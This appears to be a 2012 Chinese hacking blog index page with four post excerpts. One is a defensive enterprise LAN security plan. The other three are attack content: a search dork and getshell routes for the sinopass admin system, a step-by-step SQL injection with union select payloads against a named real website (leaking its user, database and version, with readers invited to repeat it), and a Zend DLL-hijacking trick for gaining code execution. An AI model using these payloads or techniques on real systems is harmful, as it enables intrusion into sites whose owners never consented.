sinopass后台管理系统漏洞

作者:Secer 发布时间:June 28, 2012 分类:Web安全

无意中发现:

关键词:inurl:About.asp?i_type=

自己尝试了一下  基本上都是的

后台:admin/login.asp  或者manage

拿shell方法:数据库备份  或者ewebeditor

有ewebeditor默认路径  默认数据库的  后台帐号密码可以注入  注入漏洞蛮多的 添加字段 a_name a_pass

记新手的一次渗透入侵

作者:Secer 发布时间:June 28, 2012 分类:渗透测试

一年前把,渗透了,这次发现不是root,但帐户支持load_file()
Ps:我严重鄙视挂马的人,还有那些黑心贩子。。。
Ps:我从一开始写文章到现在,不屏蔽渗透的地址连接,主要的原因还是希望
大家可以通过我的文章,真正实践性滴学习本文内容,新人朋友可以一步步滴实践操作
【懒得扯淡了,希望大家那个什么什么什么,你们懂的,人品很重要】
http://www.czxtaiji.net/content. ... leId=48%20and%201=2
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 947
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 948
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 949
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 950
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 951
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 952
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 953
获取到路径:d:\czxsite\bin\sys\config.php
clip_image002
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=48 order by 9
clip_image004
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,5,6,7,8,9
Warning: disparticlecontent(7): failed to open stream: No such file or directory in d:\czxsite\bin\sys\config.php on line 976
Warning: disparticlecontent(): Failed opening '7' for inclusion (include_path='.;c:\php4\pear') in d:\czxsite\bin\sys\config.php on line 976
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,user(),database(),7,8,version()
user():[email protected]
version():4.0.18-nt  
database():czxtaiji
clip_image006

阅读剩余部分...

某大型企业局域网安全解决方案

作者:Secer 发布时间:June 28, 2012 分类:Web安全

第一章 总则

本方案为某大型局域网网络安全解决方案,包括原有网络系统分析、安全需求分析、安全目标的确立、安全体系结构的设计、等。本安全解决方案的目标是在不影响某大型企业局域网当前业务的前提下,实现对他们局域网全面的安全管理。

1.将安全策略、硬件及软件等方法结合起来,构成一个统一的防御系统,有效阻止非法用户进入网络,减少网络的安全风险。
2.定期进行漏洞扫描,审计跟踪,及时发现问题,解决问题。
3.通过入侵检测等方式实现实时安全监控,提供快速响应故障的手段,同时具备很好的安全取证措施。
4.使网络管理者能够很快重新组织被破坏了的文件或应用。使系统重新恢复到破坏前的状态,最大限度地减少损失。
5.在工作站、服务器上安装相应的防病毒软件,由中央控制台统一控制和管理,实现全网统一防病毒。

第二章 网络系统概况

2.1 、网络概况
这个企业的局域网是一个信息点较为密集的千兆局域网络系统,它所联接的现有上千个信息点为在整个企业内办公的各部门提供了一个快速、方便的信息交流平台。不仅如此,通过专线与Internet的连接,打通了一扇通向外部世界的窗户,各个部门可以直接与互联网用户进行交流、查询资料等。通过公开服务器,企业可以直接对外发布信息或者发送电子邮件。高速交换技术的采用、灵活的网络互连方案设计为用户提供快速、方便、灵活通信平台的同时,也为网络的安全带来了更大的风险。因此,在原有网络上实施一套完整、可操作的安全解决方案不仅是可行的,而且是必需的。

2.1.1 、网络概述

这个企业的局域网,物理跨度不大,通过千兆交换机在主干网络上提供1000M的独享带宽,通过下级交换机与各部门的工作站和服务器连结,并为之提供100M的独享带宽。利用与中心交换机连结的Cisco 路由器,所有用户可直接访问Internet。

2.1.2 、网络结构

这个企业的局域网按访问区域可以划分为三个主要的区域:Internet区域、内部网络、公开服务器区域。内部网络又可按照所属的部门、职能、安全重要程度分为许多子网,包括:财务子网、领导子网、办公子网、市场部子网、中心服务器子网等。在安全方案设计中,我们基于安全的重要程度和要保护的对象,可以在Catalyst 型交换机上直接划分四个虚拟局域网(VLAN),即:中心服务器子网、财务子网、领导子网、其他子网。不同的局域网分属不同的广播域,由于财务子网、领导子网、中心服务器子网属于重要网段,因此在中心交换机上将这些网段各自划分为一个独立的广播域,而将其他的工作站划分在一个相同的网段。(图省略)

阅读剩余部分...

通过Zend目录权限不严获取执行权限

作者:Secer 发布时间:June 26, 2012 分类:黑客技巧

服务器上很多都装了 Zend
就算 C:\Program Files\ 设置过权限,安装Zend后,Zend 会自动配置目录的权限
C:\Program Files\Zend\ZendOptimizer-3.3.0\ 下的目录权限为 Everyone 全权,这导致入侵者能写入文件。
clip_image001
如果黑客入侵一个服务器,只支持 asp,或php,没有执行权限,执行组件也给禁用了,只有读写文件的权限(只要读写权限就够)。
但 C:\Program Files\Zend\ZendOptimizer-3.3.0\lib 下有 ZendExtensionManager.dll 文件,
而这个文件就算加载了,也能通过"重命名"得以修改。
而黑客只要把这个DLL换成黑客的DLL,将能加载起来!
在测试中发现,如果直接换上DLL,替换的DLL不能被Zend加载!
转换思路,软件应该是加载相关DLL再查看相关接口!  
Zend 加载 -> 替换后的dll(文件名用 ZendExtensionManager.dll ) -> 加载原DLL (这是原文件,把他改为名 ZendExtensionManager.dll.log 让自己的加载他)
测试能成功加载!

阅读剩余部分...